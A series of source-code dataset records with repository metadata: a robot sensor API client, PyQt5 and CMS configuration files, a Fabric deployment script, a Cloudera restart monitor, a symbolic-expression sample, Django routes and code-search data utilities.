c8e9a6df4de37b414ea033965c80120dab0b6e57 | d36975caedab71aaaac26156105afaf59448e445 | /机器人传感系统/2.超声波距离传感器/读取距离数据_RestfulAPI.py | 00db909c44b8986e49e69f50e5f9072b82fad478 | [
"MIT"
] | permissive | mukgong/AI-robot | 3d84b444ac8d1a0cdb061eda19bb9319c9af036e | f89d91b67705878d9e87ae09a35b436495b66707 | refs/heads/master | 2022-12-25T01:07:37.174852 | 2020-10-05T01:44:50 | 2020-10-05T01:44:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 500 | py | import requests
import json
def get_sensor():
    """Query the local RESTful sensor API and print the first ultrasonic reading.

    Sends a GET to the ultrasonic endpoint, dumps the raw response, and --
    if the payload actually contains an ultrasonic entry -- prints its id
    and value.
    """
    sensor_url = "http://127.0.0.1:9090/v1/sensors/ultrasonic"
    headers = {'Content-Type': 'application/json'}
    response = requests.get(url=sensor_url, headers=headers)
    print (response.content)
    res = json.loads(response.content)
    # Guard on the "ultrasonic" list itself: the previous len(res["data"]) > 0
    # check could pass while "ultrasonic" was missing or empty, crashing below.
    readings = res.get("data", {}).get("ultrasonic")
    if readings:
        print ("ultrasonic id = %d : value = %d "%(readings[0]["id"], readings[0]["value"]))
if __name__ == '__main__':
get_sensor() | [
"960751327@qq.com"
] | 960751327@qq.com |
fe21e112704ef230f20ffef161f404b28e8a20b9 | 45547c76b36446d6e8d29bce24f080ae7656b123 | /enev/Lib/site-packages/PyQt5/uic/port_v2/as_string.py | 556fcc0f61c752c8b57047cb5d5ddc9fb7159932 | [] | no_license | Flionay/PyQt5- | e2a0d53eef6646c7a3140ca63bb6d75429f10703 | 2b2b2b71fffd89207a67a19c81a0ce5315699447 | refs/heads/master | 2020-12-22T21:17:09.440196 | 2020-01-30T14:48:39 | 2020-01-30T14:48:39 | 236,932,533 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,475 | py | #############################################################################
##
## Copyright (c) 2020 Riverbank Computing Limited <info@riverbankcomputing.com>
##
## This file is part of PyQt5.
##
## This file may be used under the terms of the GNU General Public License
## version 3.0 as published by the Free Software Foundation and appearing in
## the file LICENSE included in the packaging of this file. Please review the
## following information to ensure the GNU General Public License version 3.0
## requirements will be met: http://www.gnu.org/copyleft/gpl.html.
##
## If you do not wish to use this file under the terms of the GPL version 3.0
## then you may purchase a commercial license. For more information contact
## info@riverbankcomputing.com.
##
## This file is provided AS IS with NO WARRANTY OF ANY KIND, INCLUDING THE
## WARRANTY OF DESIGN, MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.
##
#############################################################################
import re
def as_string(obj):
    """Render *obj* as generated Python 2 source text.

    Strings are UTF-8 encoded, escaped and wrapped in double quotes;
    everything else falls back to its str() representation.
    """
    if not isinstance(obj, basestring):
        return str(obj)
    return '"%s"' % _escape(obj.encode('UTF-8'))
_esc_regex = re.compile(r"(\"|\'|\\)")
def _escape(text):
# This escapes any escaped single or double quote or backslash.
x = _esc_regex.sub(r"\\\1", text)
# This replaces any '\n' with an escaped version and a real line break.
return re.sub(r'\n', r'\\n"\n"', x)
| [
"angyi_jq@163.com"
] | angyi_jq@163.com |
4e18bb629d0cf47b38d4f4e6bcbfd8840cd16497 | 84abce44bd0278fa99e9556168290675f399834c | /EcalAlCaRecoProducers/config/reRecoTags/pulseShapeStudy_m100.py | 1130a38c27fbf75c327984fb96b19892b85b5ca7 | [] | no_license | ECALELFS/ECALELF | 7c304c6b544b0f22a4b62cf942f47fa8b58abef0 | 62a046cdf59badfcb6281a72923a0f38fd55e183 | refs/heads/master | 2021-01-23T13:36:31.574985 | 2017-06-22T12:26:28 | 2017-06-22T12:26:28 | 10,385,620 | 1 | 9 | null | 2017-06-30T12:59:05 | 2013-05-30T15:18:55 | C++ | UTF-8 | Python | false | false | 2,240 | py | import FWCore.ParameterSet.Config as cms
from CondCore.DBCommon.CondDBSetup_cfi import *
# Conditions source: start from global tag 74X_dataRun2_Prompt_v2 and
# override selected records (intercalibration, pulse shapes, alignments).
RerecoGlobalTag = cms.ESSource("PoolDBESSource",
                               CondDBSetup,
                               connect = cms.string('frontier://FrontierProd/CMS_CONDITIONS'),
                               globaltag = cms.string('74X_dataRun2_Prompt_v2'),
                               toGet = cms.VPSet(
        # ECAL channel intercalibration constants (2012 ABCD offline set).
        cms.PSet(record = cms.string("EcalIntercalibConstantsRcd"),
                 tag = cms.string("EcalIntercalibConstants_2012ABCD_offline"),
                 connect = cms.untracked.string("frontier://FrontierProd/CMS_COND_31X_ECAL"),
                 ),
        # Pulse-shape templates time-shifted by -1 ns, read from a local sqlite file.
        cms.PSet(record = cms.string("EcalPulseShapesRcd"),
                 tag = cms.string("EcalPulseShapes_data"),
                 connect = cms.untracked.string("sqlite_file:/afs/cern.ch/cms/CAF/CMSALCA/ALCA_ECALCALIB/pulseShapes/ecaltemplates_popcon_timeShifted_-1p000000ns.db"),
                 ),
        # Measured alignments: ECAL barrel (EB), endcap (EE), preshower (ES).
        cms.PSet(record = cms.string("EBAlignmentRcd"),
                 tag = cms.string("EBAlignment_measured_v10_offline"),
                 connect = cms.untracked.string("frontier://FrontierProd/CMS_CONDITIONS"),
                 ),
        cms.PSet(record = cms.string("EEAlignmentRcd"),
                 tag = cms.string("EEAlignment_measured_v10_offline"),
                 connect = cms.untracked.string("frontier://FrontierProd/CMS_CONDITIONS"),
                 ),
        cms.PSet(record = cms.string("ESAlignmentRcd"), # only Bon!
                 tag = cms.string("ESAlignment_measured_v08_offline"),
                 connect = cms.untracked.string("frontier://FrontierProd/CMS_CONDITIONS"),
                 ),
        )
                               )
| [
"shervin.nourbakhsh@cern.ch"
] | shervin.nourbakhsh@cern.ch |
28058e366e9d750aaab587835e0cab482b1cfbc9 | 1aa44db2eb5bc0d5be21e54e3ca1f4918d5d84bf | /fabfile/servers.py | 46fd9f14a872917968e1ada16b0b196477e3cc44 | [
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | nprapps/commencement | a2aea873704120aa8249854a1d12798f1a4b1153 | 3f8642225d1910807e6419e95fafd5e0f21fbbac | refs/heads/master | 2021-07-22T00:25:36.353670 | 2021-06-16T22:56:56 | 2021-06-16T22:56:56 | 19,289,147 | 1 | 2 | null | 2015-07-03T22:44:28 | 2014-04-29T19:36:14 | JavaScript | UTF-8 | Python | false | false | 8,460 | py | #!/usr/bin/env python
"""
Commands work with servers. (Hiss, boo.)
"""
import copy
from fabric.api import local, put, settings, require, run, sudo, task
from fabric.state import env
from jinja2 import Template
import app_config
"""
Setup
"""
@task
def setup():
    """
    Setup servers for deployment.
    This does not setup services or push to S3. Run deploy() next.
    """
    require('settings', provided_by=['production', 'staging'])
    require('branch', provided_by=['stable', 'master', 'branch'])
    # Bail out unless the project has explicitly opted in to server deploys.
    if not app_config.DEPLOY_TO_SERVERS:
        print 'You must set DEPLOY_TO_SERVERS = True in your app_config.py before setting up the servers.'
        return
    # Provision in dependency order: credentials, directories, virtualenv,
    # code checkout, python/npm requirements, log directories.
    install_google_oauth_creds()
    create_directories()
    create_virtualenv()
    clone_repo()
    checkout_latest()
    install_requirements()
    setup_logs()
def create_directories():
    """
    Create server directories.
    Makes the project directory and the shared uploads directory;
    both paths come from app_config.
    """
    require('settings', provided_by=['production', 'staging'])
    run('mkdir -p %(SERVER_PROJECT_PATH)s' % app_config.__dict__)
    run('mkdir -p /var/www/uploads/%(PROJECT_FILENAME)s' % app_config.__dict__)
def create_virtualenv():
    """
    Setup a server virtualenv.
    """
    require('settings', provided_by=['production', 'staging'])
    run('virtualenv -p %(SERVER_PYTHON)s %(SERVER_VIRTUALENV_PATH)s' % app_config.__dict__)
    # NOTE(review): each fabric run() opens a fresh shell, so this `source
    # activate` does not affect later commands -- confirm it is intentional.
    run('source %(SERVER_VIRTUALENV_PATH)s/bin/activate' % app_config.__dict__)
def clone_repo():
    """
    Clone the source repository onto the server.

    If an alternate mirror URL is configured, register it as the
    'bitbucket' remote inside the freshly-cloned repository.
    """
    require('settings', provided_by=['production', 'staging'])
    run('git clone %(REPOSITORY_URL)s %(SERVER_REPOSITORY_PATH)s' % app_config.__dict__)
    if app_config.REPOSITORY_ALT_URL:
        # Bug fix: each fabric run() starts a fresh shell in $HOME, so cd into
        # the repo first -- otherwise `git remote add` targets the wrong directory.
        run('cd %(SERVER_REPOSITORY_PATH)s; git remote add bitbucket %(REPOSITORY_ALT_URL)s' % app_config.__dict__)
@task
def checkout_latest(remote='origin'):
    """
    Checkout the latest source.
    Fetches `remote`, then checks out and pulls env.branch in the
    server-side repository.
    """
    require('settings', provided_by=['production', 'staging'])
    require('branch', provided_by=['stable', 'master', 'branch'])
    run('cd %s; git fetch %s' % (app_config.SERVER_REPOSITORY_PATH, remote))
    run('cd %s; git checkout %s; git pull %s %s' % (app_config.SERVER_REPOSITORY_PATH, env.branch, remote, env.branch))
@task
def install_requirements():
    """
    Install the latest requirements.
    Upgrades pip requirements inside the server virtualenv, then installs
    npm dependencies in the repository checkout.
    """
    require('settings', provided_by=['production', 'staging'])
    run('%(SERVER_VIRTUALENV_PATH)s/bin/pip install -U -r %(SERVER_REPOSITORY_PATH)s/requirements.txt' % app_config.__dict__)
    run('cd %(SERVER_REPOSITORY_PATH)s; npm install' % app_config.__dict__)
@task
def setup_logs():
    """
    Create log directories.
    Created as root, then handed over to the ubuntu user.
    """
    require('settings', provided_by=['production', 'staging'])
    sudo('mkdir %(SERVER_LOG_PATH)s' % app_config.__dict__)
    sudo('chown ubuntu:ubuntu %(SERVER_LOG_PATH)s' % app_config.__dict__)
@task
def install_crontab():
    """
    Install cron jobs script into cron.d.
    Copies the repo's crontab file to /etc/cron.d under the project name.
    """
    require('settings', provided_by=['production', 'staging'])
    sudo('cp %(SERVER_REPOSITORY_PATH)s/crontab /etc/cron.d/%(PROJECT_FILENAME)s' % app_config.__dict__)
@task
def uninstall_crontab():
    """
    Remove a previously installed cron jobs script from cron.d.
    """
    require('settings', provided_by=['production', 'staging'])
    sudo('rm /etc/cron.d/%(PROJECT_FILENAME)s' % app_config.__dict__)
@task
def install_google_oauth_creds():
    """
    Install Google Oauth credentials file (global) from workinprivate repo
    """
    # Clone the private repo into a temp dir, copy the credentials, clean up.
    # NOTE(review): OAUTH_CREDENTIALS_PATH is not defined in this module;
    # presumably it should come from app_config -- confirm before running.
    run('git clone git@github.com:nprapps/workinprivate.git /tmp/workinprivate-tmp')
    run('cp /tmp/workinprivate-tmp/.google_oauth_credentials %s' % OAUTH_CREDENTIALS_PATH)
    run('rm -Rf /tmp/workinprivate-tmp')
@task
def remove_google_oauth_creds():
    """
    Remove Google oauth credentials file (global)
    """
    # NOTE(review): OAUTH_CREDENTIALS_PATH is not defined in this module -- confirm.
    run('rm %s' % OAUTH_CREDENTIALS_PATH)
def delete_project():
    """
    Remove the project directory. Invoked by shiva.
    """
    # Destructive: wipes the entire server-side project checkout.
    run('rm -rf %(SERVER_PROJECT_PATH)s' % app_config.__dict__)
"""
Configuration
"""
def _get_template_conf_path(service, extension):
"""
Derive the path for a conf template file.
"""
return 'confs/%s.%s' % (service, extension)
def _get_rendered_conf_path(service, extension):
    """Derive where the rendered conf file for `service` is written locally."""
    return 'confs/rendered/{0}.{1}.{2}'.format(app_config.PROJECT_FILENAME, service, extension)
def _get_installed_conf_path(service, remote_path, extension):
    """Derive the server-side installed path of the conf file for `service`."""
    return '{0}/{1}.{2}.{3}'.format(remote_path, app_config.PROJECT_FILENAME, service, extension)
def _get_installed_service_name(service):
    """Derive the init service name for an installed service."""
    return '{0}.{1}'.format(app_config.PROJECT_FILENAME, service)
@task
def render_confs():
    """
    Renders server configurations.
    Jinja-renders each template under confs/ into confs/rendered/, using
    app_config values plus secrets as the template context.
    """
    require('settings', provided_by=['production', 'staging'])
    with settings(warn_only=True):
        local('mkdir confs/rendered')
    # Copy the app_config so that when we load the secrets they don't
    # get exposed to other management commands
    context = copy.copy(app_config.__dict__)
    context.update(app_config.get_secrets())
    for service, remote_path, extension in app_config.SERVER_SERVICES:
        template_path = _get_template_conf_path(service, extension)
        rendered_path = _get_rendered_conf_path(service, extension)
        with open(template_path, 'r') as read_template:
            with open(rendered_path, 'wb') as write_template:
                payload = Template(read_template.read())
                write_template.write(payload.render(**context))
@task
def deploy_confs():
    """
    Deploys rendered server configurations to the specified server.
    This will reload nginx and the appropriate uwsgi config.
    """
    require('settings', provided_by=['production', 'staging'])
    render_confs()
    with settings(warn_only=True):
        for service, remote_path, extension in app_config.SERVER_SERVICES:
            rendered_path = _get_rendered_conf_path(service, extension)
            installed_path = _get_installed_conf_path(service, remote_path, extension)
            # Compare local (BSD `md5 -q`) and remote (`md5sum`) checksums;
            # only push and bounce the service when the file actually changed.
            a = local('md5 -q %s' % rendered_path, capture=True)
            b = run('md5sum %s' % installed_path).split()[0]
            if a != b:
                print 'Updating %s' % installed_path
                put(rendered_path, installed_path, use_sudo=True)
                if service == 'nginx':
                    sudo('service nginx reload')
                elif service == 'uwsgi':
                    service_name = _get_installed_service_name(service)
                    sudo('initctl reload-configuration')
                    sudo('service %s restart' % service_name)
                elif service == 'app':
                    # Recreate the uwsgi socket with permissions www-data can use.
                    run('touch %s' % app_config.UWSGI_SOCKET_PATH)
                    sudo('chmod 644 %s' % app_config.UWSGI_SOCKET_PATH)
                    sudo('chown www-data:www-data %s' % app_config.UWSGI_SOCKET_PATH)
            else:
                print '%s has not changed' % rendered_path
@task
def nuke_confs():
    """
    DESTROYS rendered server configurations from the specified server.
    This will reload nginx and stop the uwsgi config.
    """
    require('settings', provided_by=['production', 'staging'])
    for service, remote_path, extension in app_config.SERVER_SERVICES:
        with settings(warn_only=True):
            installed_path = _get_installed_conf_path(service, remote_path, extension)
            # Remove the installed conf, then stop/reload the matching service.
            sudo('rm -f %s' % installed_path)
            if service == 'nginx':
                sudo('service nginx reload')
            elif service == 'uwsgi':
                service_name = _get_installed_service_name(service)
                sudo('service %s stop' % service_name)
                sudo('initctl reload-configuration')
            elif service == 'app':
                sudo('rm %s' % app_config.UWSGI_SOCKET_PATH)
"""
Fabcasting
"""
@task
def fabcast(command):
"""
Actually run specified commands on the server specified
by staging() or production().
"""
require('settings', provided_by=['production', 'staging'])
if not app_config.DEPLOY_TO_SERVERS:
print 'You must set DEPLOY_TO_SERVERS = True in your app_config.py and setup a server before fabcasting.'
run('cd %s && bash run_on_server.sh fab %s $DEPLOYMENT_TARGET %s' % (app_config.SERVER_REPOSITORY_PATH, env.branch, command))
| [
"davideads@gmail.com"
] | davideads@gmail.com |
b672d74dc3ade9ca857ed2b97d2a8bc96d25a527 | d78989a8ce52a98f48d77228c4ea893f7aae31f7 | /symbolic_expressions/sample15-virt-bogus-loop-iterations-2.py | 80503fc33404de03c7ff542b5ba14a32feb2dee4 | [] | no_license | llyuer/Tigress_protection | 78ead2cf9979a7b3287175cd812833167d520244 | 77c68c4c949340158b855561726071cfdd82545f | refs/heads/master | 2020-06-17T11:16:40.078433 | 2019-04-16T09:27:29 | 2019-04-16T09:27:29 | 195,908,093 | 1 | 0 | null | 2019-07-09T01:14:06 | 2019-07-09T01:14:06 | null | UTF-8 | Python | false | false | 1,086 | py | #!/usr/bin/env python2
## -*- coding: utf-8 -*-
import sys
def sx(bits, value):
sign_bit = 1 << (bits - 1)
return (value & (sign_bit - 1)) - (value & sign_bit)
SymVar_0 = int(sys.argv[1])
ref_342 = SymVar_0
ref_353 = ref_342 # MOV operation
ref_365 = ref_353 # MOV operation
ref_367 = ref_365 # MOV operation
ref_331345 = ref_367 # MOV operation
ref_331357 = ref_331345 # MOV operation
ref_331403 = ref_331345 # MOV operation
ref_331447 = ref_331345 # MOV operation
ref_331534 = (((rol(0xE, (rol(0xE, ((((((((((((0x0) << 8 | 0x0) << 8 | 0x0) << 8 | 0x0) << 8 | 0x0) << 8 | 0x0) << 8 | 0x0) << 8 | 0x0) + ref_331357) & 0xFFFFFFFFFFFFFFFF) + 0x1F3D5B79) & 0xFFFFFFFFFFFFFFFF)) ^ ref_331403)) ^ 0x1F3D5B79) + ref_331447) & 0xFFFFFFFFFFFFFFFF) # MOV operation
ref_527456 = ref_331534 # MOV operation
ref_592749 = ref_527456 # MOV operation
ref_788657 = ref_592749 # MOV operation
ref_853947 = ref_788657 # MOV operation
ref_853985 = ref_853947 # MOV operation
ref_853997 = ref_853985 # MOV operation
ref_853999 = ref_853997 # MOV operation
print ref_853999 & 0xffffffffffffffff
| [
"jonathan.salwan@gmail.com"
] | jonathan.salwan@gmail.com |
8e823ccea7c9273bc5229ca6fc751b7284fb8a1b | 469ebcca765fb37ecfc459fcb618b0925e9b9f93 | /cloudera_roles_service_cluster_check.py | a26821c0a6e66254cf4b1ccf5ec84c18a6220aaa | [] | no_license | abha10/cloudera_monitors | b4d55ad18e9d698f90721c730ff5d9afcaa3b3fc | d53b6ece2cff08951925129e7922deac497f3c74 | refs/heads/master | 2020-06-23T23:01:55.243530 | 2019-07-25T07:19:56 | 2019-07-25T07:19:56 | 198,778,986 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,669 | py | #!/usr/bin/python
import ConfigParser, json, time, sys
from cm_api.api_client import ApiResource
from cm_api.endpoints.services import ApiService
# Read deployment settings from the external config file.
CONFIG = ConfigParser.ConfigParser()
CONFIG.read("/etc/onlinesales/config/configCloudera.ini")
# This is the host that the Cloudera Manager server is running on
CM_HOST = CONFIG.get("CM", "cm.host")
# CM admin account info
ADMIN_USER = CONFIG.get("CM", "admin.name")
ADMIN_PASS = CONFIG.get("CM", "admin.password")
#### Cluster Definition #####
CLUSTER_NAME = CONFIG.get("CM", "cluster.name")
CDH_VERSION = "CDH5"  # NOTE(review): main() compares against the literal "CDH5", not this constant
# Module-level accumulator of role names still unhealthy after restart retries.
unhealthy_roles = []
def restart_role(service, API):
    """Restart every unhealthy role of `service`, host by host.

    Each bad role gets up to 2 restart attempts, with a 3-minute wait after
    each; roles still flagged afterwards are recorded in the module-level
    `unhealthy_roles` list.  Exits the process with status 2 on API errors.
    """
    try:
        for host in API.get_all_hosts(view='full'):
            arr_len = len(host.roleRefs)
            count = 0
            i = 0
            while i < arr_len:
                count = 0
                # Retry while this role belongs to `service`, is not GOOD,
                # and we have made fewer than 2 restart attempts.
                while host.roleRefs[i].serviceName == service.name and service.get_role(host.roleRefs[i].roleName).healthSummary != "GOOD" and count < 2:
                    print "RESTARTING "+ service.name+" ROLE - "+host.roleRefs[i].roleName + " on "+ host.hostname
                    cmd = service.restart_roles(host.roleRefs[i].roleName)
                    # Give the role time to come back up before re-checking.
                    time.sleep(180)
                    count +=1
                    print "ROLE STATE: " + host.roleRefs[i].roleName + " - " + service.get_role(host.roleRefs[i].roleName).healthSummary
                #### Check whether role has started successfully or not.
                # NOTE(review): a role that recovered on the 2nd attempt still
                # satisfies `count >= 2` and is recorded as unhealthy -- confirm intended.
                if host.roleRefs[i].serviceName == service.name and (count >= 2 or service.get_role(host.roleRefs[i].roleName).healthSummary != "GOOD"):
                    unhealthy_roles.append(host.roleRefs[i].roleName)
                i += 1
    except Exception as api_ex:
        print api_ex
        exit(2)
def restart_service(service, api):
    """Restart `service` (up to 2 attempts); escalate to a full cluster
    restart if it still is not GOOD.  Exits with status 2 on API errors."""
    try:
        count = 0;
        while (service.healthSummary != "GOOD" and count < 2):
            cmd = service.restart().wait()
            count +=1
        #### Check if service has started successfully or not
        if (count >=2 and service.healthSummary != "GOOD" ):
            print "Unable to restart Service: "+ service.name
            # Escalation: a stuck service triggers a whole-cluster restart.
            restart_cluster(api)
        else:
            print service.name +" service state: " + service.healthSummary
    except Exception as ex:
        print ex
        exit(2)
def restart_cluster(API):
    """Last-resort recovery: restart the whole cluster (up to 2 attempts).

    Exits the process: status 0 when the cluster reports GOOD_HEALTH,
    status 2 when restarts fail or an API error occurs.
    """
    try:
        # Get Cluster Health Status
        CLUSTER = API.get_cluster(CLUSTER_NAME)
        count = 0
        while (CLUSTER.entityStatus != "GOOD_HEALTH" and count < 2):
            print "About to restart cluster."
            CLUSTER.restart().wait()
            print "Done restarting cluster."
            count +=1
        if (CLUSTER.entityStatus != "GOOD_HEALTH" and count >= 2):
            print "Unable to restart cluster - " + CLUSTER.name
            exit(2)
        else:
            print CLUSTER_NAME+ " CLUSTER STATE: " + CLUSTER.entityStatus
            exit(0)
    except Exception as api_ex:
        print api_ex
        exit(2)
### Main function ###
def main():
    """Entry point: restart unhealthy roles, report them, then restart services."""
    API = ApiResource(CM_HOST, version=16, username=ADMIN_USER, password=ADMIN_PASS)
    # Locate the CDH5 cluster among all clusters managed by this CM host.
    # NOTE(review): if no cluster reports version "CDH5", `cdh5` is never
    # bound and the loops below raise NameError -- confirm acceptable.
    for c in API.get_all_clusters():
        if c.version == "CDH5":
            cdh5 = c
    for s in cdh5.get_all_services():
        restart_role(s,API)
    if (unhealthy_roles == []):
        print("ALL ROLES: OK")
    else:
        print("Following is the list of all unhealthy Roles:\n ")
        for role in unhealthy_roles:
            print("\n\t\t" + role)
    # Roles first, then a service-level restart pass over the same services.
    for s in cdh5.get_all_services():
        restart_service(s,API)
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | abha10.noreply@github.com |
894e55b082cb3914fb996ae8d5cc3b0edd1bb781 | 24706d3bf851a5217b39dbe32b11f4a149f30192 | /ImageNet/networks/model_list/__init__.py | a18f944713b7558d6e360a01fae51399cdaa227d | [] | no_license | MariusAnje/SEU_NNFailure | 23375eb3e262a2915628ef2c872347f81fb860df | 8fadb8f213505eda83ae90abbe1ed9a0233a8fd8 | refs/heads/master | 2020-04-12T17:54:53.665859 | 2018-12-21T04:03:34 | 2018-12-21T04:03:34 | 162,661,885 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 28 | py | from alexnet import alexnet
| [
"jiecaoyu@umich.edu"
] | jiecaoyu@umich.edu |
902f96abdf7d52b75cb5bc40474b9d4d91c7c31e | c8566cf1c90de5ee22fd7a57a07b4c93ea8efbe1 | /code_search/notebooks/general_utils.py | 0560a43a7effbe90c3b076d5bb529d3dba0aa6b7 | [
"MIT",
"Python-2.0"
] | permissive | prasad-adi/deep-code-search-preprocessing | 86de50088c6d7c409b063c8a73c84df4f1a8afcb | 9331566455dbda10a65f67e64ba72c4158c75c61 | refs/heads/master | 2020-05-05T12:43:08.353401 | 2019-04-07T23:53:48 | 2019-04-07T23:53:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,271 | py | import logging
import pickle
from itertools import chain
from math import ceil
from pathlib import Path
from typing import List, Callable, Any
import nmslib
import wget
from more_itertools import chunked
from pathos.multiprocessing import Pool, cpu_count
def save_file_pickle(fname: str, obj: Any):
    """Serialize `obj` to the file `fname` using pickle."""
    with open(fname, 'wb') as out_fh:
        pickle.dump(obj, out_fh)
def load_file_pickle(fname: str):
    """Read and return the pickled object stored in `fname`."""
    with open(fname, 'rb') as in_fh:
        return pickle.load(in_fh)
def read_training_files(data_path: str):
    """
    Read the train/valid/test splits for functions, docstrings, api
    sequences and function names from `data_path`.

    Train and validation are concatenated (a downstream Keras split
    re-divides them randomly).  Returns the tuple
    (tv_enc, h_enc, tv_dec, h_dec, tv_api, h_api, tv_fun, h_fun).
    """
    PATH = Path(data_path)

    def _read_lines(fname):
        # One split file -> list of raw lines (trailing newlines preserved).
        with open(PATH / fname, 'r') as f:
            return f.readlines()

    # encoder input: function bodies (train + validation combined)
    tv_enc = _read_lines('train.function') + _read_lines('valid.function')
    h_enc = _read_lines('test.function')
    # decoder input: docstrings
    tv_dec = _read_lines('train.docstring') + _read_lines('valid.docstring')
    h_dec = _read_lines('test.docstring')
    # auxiliary sequences: api calls and function names
    tv_api = _read_lines('train.api_seq') + _read_lines('valid.api_seq')
    tv_fun = _read_lines('train.function_name') + _read_lines('valid.function_name')
    h_api = _read_lines('test.api_seq')
    h_fun = _read_lines('test.function_name')

    logging.warning(f'Num rows for encoder training + validation input: {len(tv_enc):,}')
    logging.warning(f'Num rows for encoder holdout input: {len(h_enc):,}')
    logging.warning(f'Num rows for decoder training + validation input: {len(tv_dec):,}')
    logging.warning(f'Num rows for decoder holdout input: {len(h_dec):,}')
    return tv_enc, h_enc, tv_dec, h_dec, tv_api, h_api, tv_fun, h_fun
def apply_parallel(func: Callable,
                   data: List[Any],
                   cpu_cores: int = None) -> List[Any]:
    """
    Apply `func` to chunks of `data` in parallel.

    Chunk size is chosen automatically so each core receives one chunk.
    Returns the per-chunk results in order.
    """
    if not cpu_cores:
        cpu_cores = cpu_count()

    pool = None
    try:
        chunk_size = ceil(len(data) / cpu_cores)
        pool = Pool(cpu_cores)
        transformed_data = pool.map(func, chunked(data, chunk_size), chunksize=1)
    finally:
        # Bug fix: if Pool(...) itself raised, `pool` was unbound and the
        # finally block raised NameError, masking the original exception.
        if pool is not None:
            pool.close()
            pool.join()
    return transformed_data
def flattenlist(listoflists: List[List[Any]]):
    """Flatten one level of nesting into a single list."""
    return [element for sublist in listoflists for element in sublist]
# Public GCS mirrors of the preprocessed code-search data: per-split function
# bodies, docstrings, lineage files and original-function dumps.
processed_data_filenames = [
    'https://storage.googleapis.com/kubeflow-examples/code_search/data/test.docstring',
    'https://storage.googleapis.com/kubeflow-examples/code_search/data/test.function',
    'https://storage.googleapis.com/kubeflow-examples/code_search/data/test.lineage',
    'https://storage.googleapis.com/kubeflow-examples/code_search/data/test_original_function.json.gz',
    'https://storage.googleapis.com/kubeflow-examples/code_search/data/train.docstring',
    'https://storage.googleapis.com/kubeflow-examples/code_search/data/train.function',
    'https://storage.googleapis.com/kubeflow-examples/code_search/data/train.lineage',
    'https://storage.googleapis.com/kubeflow-examples/code_search/data/train_original_function.json.gz',
    'https://storage.googleapis.com/kubeflow-examples/code_search/data/valid.docstring',
    'https://storage.googleapis.com/kubeflow-examples/code_search/data/valid.function',
    'https://storage.googleapis.com/kubeflow-examples/code_search/data/valid.lineage',
    'https://storage.googleapis.com/kubeflow-examples/code_search/data/valid_original_function.json.gz',
    'https://storage.googleapis.com/kubeflow-examples/code_search/data/without_docstrings.function',
    'https://storage.googleapis.com/kubeflow-examples/code_search/data/without_docstrings.lineage',
    'https://storage.googleapis.com/kubeflow-examples/code_search/data/without_docstrings_original_function.json.gz']
def get_step2_prerequisite_files(output_directory):
    """Download the preprocessed data files into `output_directory`.

    Raises:
        ValueError: if `output_directory` already contains any files.
            (Explicit exception instead of `assert`, which would be
            silently stripped when running under `python -O`.)
    """
    outpath = Path(output_directory)
    if list(outpath.glob('*')):
        raise ValueError(f'There are files in {str(outpath.absolute())},'
                         f' please clear files or specify an empty folder.')
    outpath.mkdir(exist_ok=True)
    print(f'Saving files to {str(outpath.absolute())}')
    for url in processed_data_filenames:
        print(f'downloading {url}')
        wget.download(url, out=str(outpath.absolute()))
def create_nmslib_search_index(numpy_vectors):
    """Create search index using nmslib.

    Builds an HNSW (hierarchical navigable small world) index over the rows
    of `numpy_vectors`, using cosine similarity as the distance measure.

    Parameters
    ==========
    numpy_vectors : numpy.array
        The matrix of vectors

    Returns
    =======
    nmslib object that has index of numpy_vectors
    """
    search_index = nmslib.init(method='hnsw', space='cosinesimil')
    search_index.addDataPointBatch(numpy_vectors)
    # 'post' controls index post-processing effort (see nmslib HNSW parameters).
    search_index.createIndex({'post': 2}, print_progress=True)
    return search_index
| [
"chnsh24@gmail.com"
] | chnsh24@gmail.com |
e5124fdf4ee9e559c3d85652aa15f109ff7c5a64 | ca94248bc112ffb4b877ad7aa1585278c4d94e36 | /project14/urls.py | 934f4139737d3b31110ff97845a9e5bb19134c64 | [] | no_license | madisettydivya/bootstrap | b7d8b8d420da0bcc4dd644971feccf2654e27f18 | 35676ce0d65adfbbb2f69f758c5699cacb25692e | refs/heads/main | 2023-07-13T19:51:19.557914 | 2021-08-24T14:11:42 | 2021-08-24T14:11:42 | 399,489,358 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 964 | py | """project14 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from app.views import *
# Route table: Django admin plus the three bootstrap demo views from app.views.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('bootstrap_cdn/',bootstrap_cdn,name='bootstrap_cdn'),
    path('bootstrap_download/',bootstrap_download,name='bootstrap_download'),
    path('carousel/',carousel,name='carousel'),
]
| [
"madisettysaidivya22@gmail.com"
] | madisettysaidivya22@gmail.com |
23867764f0cc8d30cda919abd564c7282ccb15db | facb8b9155a569b09ba66aefc22564a5bf9cd319 | /wp2/merra_scripts/03_model_fitting/merraRF882/201-tideGauge.py | 52b44422312b41361c88c8c467dad6e7167ae1b9 | [] | no_license | moinabyssinia/modeling-global-storm-surges | 13e69faa8f45a1244a964c5de4e2a5a6c95b2128 | 6e385b2a5f0867df8ceabd155e17ba876779c1bd | refs/heads/master | 2023-06-09T00:40:39.319465 | 2021-06-25T21:00:44 | 2021-06-25T21:00:44 | 229,080,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,456 | py | # -*- coding: utf-8 -*-
"""
Created on Mon May 4 15:51:30 2020
This program is designed to validate a Random Forest
model by using the KFOLD method
@author: Michael Tadesse
"""
#import packages
import os
import glob
import numpy as np
import pandas as pd
from sklearn import metrics
from scipy import stats
import seaborn as sns
import matplotlib.pyplot as plt
from datetime import datetime
from sklearn.ensemble import RandomForestRegressor
from sklearn.decomposition import PCA
